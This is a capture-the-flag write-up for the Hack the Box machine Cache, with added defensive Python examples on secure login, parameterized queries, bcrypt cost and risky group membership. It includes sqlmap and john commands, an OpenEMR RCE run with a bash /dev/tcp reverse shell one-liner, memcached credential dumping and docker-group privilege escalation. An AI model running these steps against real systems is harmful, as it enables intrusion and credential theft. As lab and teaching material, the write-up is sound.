Introduction

IP: 10.10.10.172 Difficulty: Easy

This is my write-up for the Hack the Box machine Cache.

Initial nmap Scan

Running the initial nmap scan:

nmap -sV -sC -p- -oN nmap 10.10.10.188

Yielded the following results:

Nmap Scan

These results show that there are two ports open:

Port 80: Apache web server

Enumerating the Web Server

Navigating to the web server, I am presented with this webpage

Homepage

I navigated through the webpage to try to find some useful information.

Login Page

Login Page

The login page presents me with a login form. I tried some default credentials here with no success. I noticed that the website tells you which input is incorrect, which would be helpful when trying to brute-force usernames and passwords.

My next step was to capture this login request with BurpSuite. To my surprise, there was no POST request. Since the username and password inputs still had to be validated, the credentials must be compared locally (in my browser). To verify this, I checked Firefox's debugger, and there was a file called functionality.js.

Functionality.js

It looks like the webpage validates the user input locally, and I am presented with the plaintext username and password:

USERNAME - ash

PASSWORD - H@v3_fun

Sure enough, the credentials worked.
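Why this works, and what the fix looks like: the check runs in the browser, so the expected values have to be shipped to every visitor, and the per-field error messages additionally tell a guesser which half is already right. The following Python script is an added example, not part of the write-up or of the Cache box: it flags this pattern in JavaScript source (a constructed sample modelled on functionality.js, using the two values recovered above), and shows the server-side alternative, where only a salted PBKDF2 hash is stored and one generic message covers both failure cases. The function names and the sample JS are assumptions.

```python
import hashlib
import hmac
import os
import re

# Constructed sample in the style of functionality.js: the comparison runs in the
# browser, so the expected values have to be shipped to every visitor. The two
# literals are the ones the write-up recovered from the real file.
SAMPLE_JS = """
function checkCorrectPassword() {
    var Password = $("#password").val();
    if (Password != 'H@v3_fun') {
        alert("Password is not correct");
    }
}
function checkCorrectUserName() {
    var Username = $("#username").val();
    if (Username != 'ash') {
        alert("Username is not correct");
    }
}
"""

# A credential-looking identifier compared (==, !=, ===, !==) against a string literal.
CRED_COMPARE = re.compile(
    r"""(\w*(?:user|pass|pwd)\w*)\s*[!=]==?\s*(['"])(.*?)\2""",
    re.IGNORECASE,
)


def find_hardcoded_credentials(js_source: str) -> list:
    """Return (identifier, literal) pairs; anything found here is a finding for code review."""
    return [(m.group(1), m.group(3)) for m in CRED_COMPARE.finditer(js_source)]


def make_password_record(password: str, iterations: int = 600_000) -> dict:
    """Server-side storage: a random salt and a PBKDF2-HMAC-SHA256 digest, never the plaintext."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt, "iterations": iterations, "digest": digest}


def verify_password(record: dict, candidate: str) -> bool:
    """Constant-time comparison of the recomputed digest; the browser only sees the verdict."""
    digest = hashlib.pbkdf2_hmac("sha256", candidate.encode(), record["salt"], record["iterations"])
    return hmac.compare_digest(digest, record["digest"])


# Hashing against a dummy record for unknown usernames keeps the response time similar
# for "no such user" and "wrong password", so timing does not leak which field failed.
_DUMMY_RECORD = make_password_record("not-a-real-password")


def login(users: dict, username: str, candidate: str) -> str:
    """One generic message for both failure cases, unlike the page's per-field hints."""
    record = users.get(username, _DUMMY_RECORD)
    ok = verify_password(record, candidate)  # always do the work, even for unknown users
    if record is _DUMMY_RECORD or not ok:
        return "Invalid username or password"
    return "OK"


if __name__ == "__main__":
    print(find_hardcoded_credentials(SAMPLE_JS))
    users = {"ash": make_password_record("H@v3_fun")}
    print(login(users, "ash", "H@v3_fun"), login(users, "ash", "guess"), login(users, "nobody", "guess"))
```

The regex is deliberately loose (any identifier containing user, pass or pwd compared to a literal) because false positives are cheap in code review while a missed hard-coded secret is not.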

Under Construction

Sadly, there was nothing beyond the login page apart from an ‘Under Construction’ notice. Perhaps the credentials will be useful for later.

About

Author Page

There seems to be little information here; however, Ash mentions another project of his, ‘HMS’.

This led me to edit my /etc/hosts file to add cache.htb and HMS.htb to it.

Hosts file

I hoped this would work, and it did.

OpenEMR portal

I checked the source code to see if any version details, or information were revealed. On the main page, there was the copyright notice which dated to 2018.

NB: I noticed that other methods like fuzzing were less “lucky” in getting the same result.

After some time, I came across a video demonstrating SQL injection: OpenEMR Simulated Attack

Gaining Access to OpenEMR

Explaining the steps in the video in context with Cache:

  1. Navigate to HMS.htb/portal/add_edit_event_user.php?eid='. I knew it was vulnerable when the following webpage was displayed:

SQL Error

  2. Open BurpSuite and reload the page to capture the request:

GET /portal/add_edit_event_user.php?eid=%27 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=cdghrt7lln9k1shbvtdmdkjr6n; OpenEMR=djap8b3iolchp81ipr95nj8il
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

  3. Copy the request into a file, removing the %27 on the first line of the request and replacing it with a ‘1’. This makes the request valid so SQLmap can work effectively.

  4. Use SQLmap with the following command: sqlmap -r <request file> --threads 10 --dbs

SQL Map
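The SQL error page in step 1 is the tell: the value of eid is being spliced into the SQL text, so an unbalanced quote breaks the statement and the database complains. The following Python script is an added example, not from the write-up or from OpenEMR: it reproduces the defect against a constructed in-memory SQLite table (the events table and eid column are assumptions) next to the corrected handler, which validates the type and binds the value as a parameter so the same input is rejected before any SQL runs. The errors_on_quote helper is the kind of check a developer can keep in a test suite.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed in-memory stand-in for the calendar table behind add_edit_event_user.php."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE events (eid INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO events VALUES (?, ?)", [(1, "Checkup"), (2, "Follow-up")])
    return conn


def lookup_event_vulnerable(conn: sqlite3.Connection, eid: str) -> list:
    """The request parameter is pasted into the SQL text, so a lone quote leaves the
    string literal unterminated and the database reports a syntax error."""
    sql = "SELECT title FROM events WHERE eid = '" + eid + "'"
    return conn.execute(sql).fetchall()


def lookup_event_safe(conn: sqlite3.Connection, eid: str) -> list:
    """Reject anything that is not an integer, then bind the value as a parameter:
    the input can only ever be data, never part of the statement."""
    if not eid.isdigit():
        raise ValueError("eid must be a positive integer")
    return conn.execute("SELECT title FROM events WHERE eid = ?", (int(eid),)).fetchall()


def errors_on_quote(conn: sqlite3.Connection, lookup) -> bool:
    """Unit-test style probe: True if a single quote reaches the database and breaks the
    query (the injection signal), False if the handler rejects it before any SQL runs."""
    try:
        lookup(conn, "'")
    except sqlite3.OperationalError:
        return True
    except ValueError:
        return False
    return False


if __name__ == "__main__":
    conn = build_db()
    print(lookup_event_vulnerable(conn, "1"), errors_on_quote(conn, lookup_event_vulnerable))
    print(lookup_event_safe(conn, "1"), errors_on_quote(conn, lookup_event_safe))
```

A second, independent defence is to never render the raw database error to the client: the screenshot above is what lets an outsider confirm the weakness without guessing, so a generic error page plus server-side logging removes that signal even if a query is missed.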

Running sqlmap -r openemr.req --threads 10 --tables provides us with a list of tables. Searching through these, we see the following:

SQL Tables

Dumping the data of each table, users_secure contained some very interesting data:

SQL Tables

USERNAME - openemr_admin

HASH - $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B.
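Why this hash falls to a wordlist so quickly: the 05 between the dollar signs is the bcrypt cost, so the key setup runs 2^5 = 32 times per guess, roughly 128 times cheaper than the cost of 12 that is common today. The script below is an added example (not part of the write-up) that parses the hash shown above into its fields and audits a constructed list of stored hashes for a low cost; the MIN_COST threshold is an assumption a site would set from its own policy.

```python
import re

# bcrypt modular-crypt layout: $<variant>$<cost>$<22-char salt><31-char digest>,
# both encoded in bcrypt's own base64 alphabet (./A-Za-z0-9).
BCRYPT_RE = re.compile(r"^\$(2[abxy]?)\$(\d{2})\$([./A-Za-z0-9]{22})([./A-Za-z0-9]{31})$")

# The openemr_admin hash from the users_secure dump above.
PAGE_HASH = "$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B."

# Assumed policy floor: cost below this is reported as weak.
MIN_COST = 10


def parse_bcrypt(h: str) -> dict:
    """Split a bcrypt string into its fields; the cost is log2 of the key-setup rounds."""
    m = BCRYPT_RE.match(h)
    if not m:
        raise ValueError("not a bcrypt hash")
    variant, cost, salt, digest = m.groups()
    return {
        "variant": variant,
        "cost": int(cost),
        "rounds": 2 ** int(cost),
        "salt": salt,
        "digest": digest,
    }


def work_factor_ratio(cost_a: int, cost_b: int) -> int:
    """How many times more work per guess cost_b demands than cost_a."""
    return 2 ** (cost_b - cost_a)


def audit_hashes(rows, min_cost: int = MIN_COST) -> list:
    """Return (username, cost) for every stored hash whose cost is below min_cost."""
    weak = []
    for username, h in rows:
        try:
            cost = parse_bcrypt(h)["cost"]
        except ValueError:
            continue  # not bcrypt; out of scope for this check
        if cost < min_cost:
            weak.append((username, cost))
    return weak


if __name__ == "__main__":
    info = parse_bcrypt(PAGE_HASH)
    print(f"variant={info['variant']} cost={info['cost']} rounds={info['rounds']}")
    print("cost 12 would be", work_factor_ratio(info["cost"], 12), "x more work per guess")
    print(audit_hashes([("openemr_admin", PAGE_HASH)]))
```

Because the cost is stored inside the hash, an application can rehash a user's password at a higher cost the next time they log in successfully, so raising the floor does not require a reset campaign.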

Cracking with John

First, copy the hash into a file, then run john -w=/path/to/rockyou.txt hashfile followed by john --show hashfile.

Cracked Password

Now we have the password: xxxxxx

Successful Log in

And I successfully logged in.

RCE Exploit

After gaining access to OpenEMR, I found an exploit that matched this version of OpenEMR, which can be found on Exploit-DB HERE.

This lets me remotely execute a single command on the server.

To make this useful, I searched for reverse shell bash one-liners and came across this:

bash -i >& /dev/tcp/your_ip/your_port 0>&1

Set up a netcat listener and execute the RCE exploit:

nc -lvnp 7777

python rce.py http://HMS.htb -u openemr_admin -p xxxxxx -c "bash -i >& /dev/tcp/yourip/7777 0>&1"

Reverse Shell

I get a shell, running as www-data

Gaining User 1

The shell wasn't very stable at this point, so I tried to spawn a TTY shell. First I ran which python3, which told me that python3 was installed.

To spawn a TTY shell with python3 I used:

python3 -c 'import pty; pty.spawn("/bin/sh")'

I navigated to the /home/ directory and noticed that ‘ash’ was present.

Using the password I grabbed from functionality.js, I switched user:

SU

Navigating to the ash directory I got user.txt

Gaining User 2

I downloaded linpeas.sh to my machine and used python -m SimpleHTTPServer 80 to host the file, then downloaded it from the box:

wget <yourip>:80/linpeas.sh

chmod +x linpeas.sh

Whilst going through the results of linpeas, I noticed ‘/usr/bin/memcached’ running on port 11211.

It was only listening internally, so I decided to telnet into it:

telnet 127.0.0.1 11211

Using the following website, I learned how to exploit the server: HERE

stats slabs

stats slabs

stats cachedump 1 0

Dumping the cache, we see a user and a passwd item. To view these, we use get <item>:

get user

get passwd

So now we have another set of credentials!

USER - luffy

PASSWORD - 0n3_p1ec3

I then switch user to luffy

switch user luffy

Running id, I found that luffy is part of the docker group:

luffy id

I found the docker binary in /usr/bin/ and decided to check GTFOBins, where I found the docker entry:

docker gtfobin

I checked the Shell section and found the command:

docker shell

Running this command shows that the alpine keyword is the image name, which was not present on this machine, so I ran docker images to find the images on the machine. This showed that an ubuntu image was on the system.

So, running the command with that image:

Exploit

This gave me root!

Reading /root/root.txt gives me the root flag!
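Membership in the docker group is the lesson of this last step: the Docker daemon runs as root and does not re-check the caller's privileges, so being able to talk to it is equivalent to having root, which is why GTFOBins lists it next to sudo. The script below is an added example (not part of the write-up) that parses /etc/group content, constructed here with luffy in docker as on the box, and reports members of groups that should be reviewed with the same rigour as a root login. The ROOT_EQUIVALENT set is an assumption a site may tune; the rest of the groups file is constructed.

```python
# Constructed /etc/group excerpt modelled on the box: luffy sits in the docker group.
SAMPLE_GROUP_FILE = """root:x:0:
sudo:x:27:
docker:x:999:luffy
ash:x:1000:
luffy:x:1001:
"""

# Groups whose membership amounts to root on a typical Linux host (assumed set):
# sudo/wheel via the sudo policy, docker and lxd because members can start containers
# with the host filesystem mounted, disk because members can read and write block
# devices directly.
ROOT_EQUIVALENT = {"sudo", "wheel", "docker", "lxd", "disk"}


def parse_group_file(text: str) -> dict:
    """Map group name -> list of supplementary members from /etc/group content."""
    groups = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        name, _password, _gid, members = line.split(":", 3)
        groups[name] = [m for m in members.split(",") if m]
    return groups


def find_root_equivalent_members(groups: dict, sensitive=ROOT_EQUIVALENT) -> list:
    """Return sorted (group, user) pairs that deserve the same scrutiny as a root login."""
    return sorted((g, u) for g, members in groups.items() if g in sensitive for u in members)


if __name__ == "__main__":
    # On a real host: with open("/etc/group") as f: groups = parse_group_file(f.read())
    groups = parse_group_file(SAMPLE_GROUP_FILE)
    for group, user in find_root_equivalent_members(groups):
        print(f"{user} is in {group}: treat as root-equivalent")
```

Run periodically from configuration management, this turns a quiet privilege grant like the one on the box into a reviewable finding; the remedy is to keep application accounts out of such groups and, where container access is genuinely needed, to use rootless Docker or a socket proxy that restricts what the caller may ask the daemon to do.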